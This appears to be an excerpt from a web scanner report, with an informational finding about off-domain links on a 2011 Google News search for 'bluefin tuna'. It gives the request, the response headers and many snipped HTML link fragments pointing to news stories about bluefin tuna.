<h2 class="title"> <a target="_blank" class="usg-AFQjCNEAs5yHkoxf5PLIbduZdvDTPNANTw " href="http://www.smh.com.au/environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html" id="MAA4AEgFUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg " title="Care2.com"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg "> Care2.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGjeMWFHNSlwu8XejXELihMYQVcvA " href="http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html" id="MAA4AEgGUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" target="_blank" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg " id="MAA4AEgGUAFgAmoCdXN6AA"><b>
...[SNIP]...
<div class="aa-inner"><a href="http://www.perishablenews.com/index.php?article=0012418" target="_blank" class="usg-AFQjCNEb2onXiwetCVbrzfC8pLeqUq_iLw " id="MAA4AEgGUAJgAmoCdXN6AA"><b>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGU4Dw__ikAvrPZ4CXmdyvVoq1ekQ " href="http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html" id="MAA4AEgGUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=s&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNGGwDZ81cCB2GkskNjd5BFz1-wQZA " title="FIS.com (Registro)"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=s&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNGGwDZ81cCB2GkskNjd5BFz1-wQZA "> FIS.com (Registro) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGEvz8wD5KFUBDRm8fyTutGxh15BA " href="http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919" id="MAA4AEgHUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.theaustralian.com.au/business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502" target="_blank" class="usg-AFQjCNHSGv6ptSe6ATRL04XhL1LAb8DP9g " id="MAA4AEgHUAFgAmoCdXN6AA">Clean Seas <b>
...[SNIP]...
<div class="aa-inner"><a href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=e&amp;special=&amp;ndb=1%20target=" target="_blank" class="usg-AFQjCNFrD2qfITwsI5Hls4kuQEAJuC4YOg " id="MAA4AEgHUAJgAmoCdXN6AA">Clean Seas cuts its financial losses</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG8ugL9cP4_P_deE4rc6bJsN-B8Cg " href="http://www.portlincolntimes.com.au/news/local/news/general/captive-tuna-spawn-again/2056995.aspx" id="MAA4AEgHUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDU8BhJeFC8fWZCb6uhT-qKM1UPQ " href="http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916" id="MAA4AEgHUARgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFvJ5WUoobkuCPj9ljljw0mWx5tJg " href="http://sj.farmonline.com.au/news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx" id="MAA4AEgHUAVgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market" class="usg-AFQjCNHu1z-4ORhHR4_rVodkSQbI-MiUbQ " title="Opposing Views"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/3OgxI_fxtvqsQM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market" class="usg-AFQjCNHu1z-4ORhHR4_rVodkSQbI-MiUbQ "> Opposing Views </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHu1z-4ORhHR4_rVodkSQbI-MiUbQ " href="http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market" id="MAA4AEgIUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.emagazine.com/view/?5489" target="_blank" class="usg-AFQjCNHLfbvmdTXC_JFpoj9By0s9_ZrFJg " id="MAA4AEgIUAFgAmoCdXN6AA">More Sustainable Sushi</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.projo.com/opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html" target="_blank" class="usg-AFQjCNFSHqxzZNorv-GD6GRevN8tf1VjUw " id="MAA4AEgIUAJgAmoCdXN6AA">David E. Preble: Parisian <b>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUzQytF4YUm3hkyaxnBn6FMo51QQ " href="http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren" id="MAA4AEgIUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGbM6wrHBqq9Iz3qod7D0OxahPBPQ " href="http://food.change.org/blog/view/bluefin_brigade_to_the_rescue" id="MAA4AEgIUARgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFgg6TzF0vDdzqoj-Hg6p_dX--3jg " href="http://cnews.canoe.ca/CNEWS/Environment/Suzuki/2011/01/18/16940341.html" id="MAA4AEgJUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979" target="_blank" class="usg-AFQjCNHX59xpWXbvg3fyXLkYwUCR1S5vuw " id="MAA4AEgJUAFgAmoCdXN6AA">World of Mouth: Tunarama!</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html" target="_blank" class="usg-AFQjCNGSOsUWp9b0dGDt-SyTBDvQXCneOA " id="MAA4AEgJUAJgAmoCdXN6AA">World-renowned Chefs Join Call to Boycott <b>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG2-iG7R684r1nozJ4ewcSV6P-fqw " href="http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/" id="MAA4AEgKUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/" target="_blank" class="usg-AFQjCNHorcaXaj6CgrvEd-2rU2qMSnAnBA " id="MAA4AEgKUAFgAmoCdXN6AA"><b>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ " title="GlobalPost"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/jjoyaNQIIh1KxM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ "> GlobalPost </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ " href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" id="MAA4AEgLUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEbnuNQI9Gw-zL-cLl7x8zaWq2NGQ " href="http://www.abc.net.au/news/stories/2011/01/20/3117032.htm?section=justin" id="MAA4AEgMUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.courthousenews.com/2011/01/14/33343.htm" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw " title="Courthouse News Service"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/eI4OOL36knZZuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.courthousenews.com/2011/01/14/33343.htm" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw "> Courthouse News Service </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw " href="http://www.courthousenews.com/2011/01/14/33343.htm" id="MAA4AEgNUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q " title="FIS"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/fc1AgDdsCkgA6M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q "> FIS </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q " href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" id="MAA4AEgOUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://feeds.nytimes.com/click.phdo?i=af650d703efc23e899208543684d8cbe" class="usg-AFQjCNFHut3J84rCrCqV1Aeih20Np3Jb2A " title="New York Times (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/xutV8JB5EOQTBM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://feeds.nytimes.com/click.phdo?i=af650d703efc23e899208543684d8cbe" class="usg-AFQjCNFHut3J84rCrCqV1Aeih20Np3Jb2A "> New York Times (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFHut3J84rCrCqV1Aeih20Np3Jb2A " href="http://feeds.nytimes.com/click.phdo?i=af650d703efc23e899208543684d8cbe" id="MAA4AEgPUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html" class="usg-AFQjCNEGMM76-7u-8Gi1OSETdzn7Sk9ARw " title="VietNamNet Bridge"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/daGfwFLj9mtOaM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html" class="usg-AFQjCNEGMM76-7u-8Gi1OSETdzn7Sk9ARw "> VietNamNet Bridge </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFOHeTN6xxu80u2Fggr0eJMZq5-1g " href="http://www.thestandard.com.hk/news_detail.asp?we_cat=4&amp;art_id=107529&amp;sid=31063765&amp;con_type=1&amp;d_str=20110127&amp;fc=4" id="MAA4AEgQUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm" target="_blank" class="usg-AFQjCNHLtx-zlG_bsYbqz7VY3aNvcI2WkQ " id="MAA4AEgQUAFgAmoCdXN6AA">Ocean Park &#39;putting species at risk&#39;</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species" target="_blank" class="usg-AFQjCNFPnm0dnzgpsDQlDK1hA1hHLmgxJw " id="MAA4AEgQUAJgAmoCdXN6AA">Greens slam Hong Kong theme park for importing endangered species</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " title="FIS"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/OzTKJ8O_yM764M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg "> FIS </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" id="MAA4AEgRUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house" class="usg-AFQjCNEWdZD9Y7T5LGjIYEk-cJVQvX1oyQ " title="The Guardian"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house" class="usg-AFQjCNEWdZD9Y7T5LGjIYEk-cJVQvX1oyQ "> The Guardian </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHMv3K4gAqJ5CkhAEDN_ZJQ5lnMHw " href="http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more" id="MAA4AEgSUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Oeftb-uHSaY">Video:&nbsp;
Fishermen, Businesses Beg for BP Spill Money
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html" target="_blank" class="usg-AFQjCNFziuziyKtuPUEMEPJVJt8a8dHlQA " id="MAA4AEgSUAFgAmoCdXN6AA">The Evaluation of Deepwater Horizon&#39;s Environmental Toll (Challenges of a <b>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGrmaXn4rnBXnKkfUC9wmTg48EoCA " href="http://www.wcti12.com/news/26551757/detail.html" id="MAA4AEgTUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html" class="usg-AFQjCNHJgKrjx821lalk2U6xhw6rFd8OBw " title="The Japan Times"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/m_RRa0TEX_jRIM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg " title="Care2.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/5JW1H-EtagraLM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=e&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNFrD2qfITwsI5Hls4kuQEAJuC4YOg " title="FIS"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/BvF8L9lLTDrvLM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.emagazine.com/view/?5489" class="usg-AFQjCNHLfbvmdTXC_JFpoj9By0s9_ZrFJg " title="E/The Environmental Magazine"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/F7C1doZL8a7VoM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " title="Change.org"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/jTNUn2OVcHDKyM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " title="Journal Pioneer"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/h6cjkbvjeTNmZM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ " title="GlobalPost"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/jjoyaNQIIh1KxM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.courthousenews.com/2011/01/14/33343.htm" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw " title="Courthouse News Service"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/eI4OOL36knZZuM/6.jpg" width="80" height="80"></a>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q " title="FIS"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/fc1AgDdsCkgA6M/6.jpg" width="80" height="80"></a>
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.33. http://news.google.com/news/section  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/section

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/section?pz=1&cf=all&ned=us&hl=en&q=bluefin+tuna&scoring=n HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:24 GMT
Expires: Thu, 03 Feb 2011 01:03:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;scoring=n&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<a href="/news?pz=1&amp;cf=all&amp;ned=us&amp;ict=ln" class="persistentblue"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGiQqeydXCx7U-Zo5WcdMqY9g8UuA " href="http://www.abc.net.au/news/stories/2011/02/03/3128653.htm?section=justin" id="MAA4AEgAUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A " title="The Japan Times"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/8HowTz6s2u8k9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A "> The Japan Times </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A " href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" id="MAA4AEgBUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " title="Change.org"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/jTNUn2OVcHDKyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw "> Change.org </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" id="MAA4AEgCUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " title="FIS"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/OzTKJ8O_yM764M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg "> FIS </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" id="MAA4AEgDUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " title="Journal Pioneer"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/h6cjkbvjeTNmZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug "> Journal Pioneer </a>
...[SNIP]...
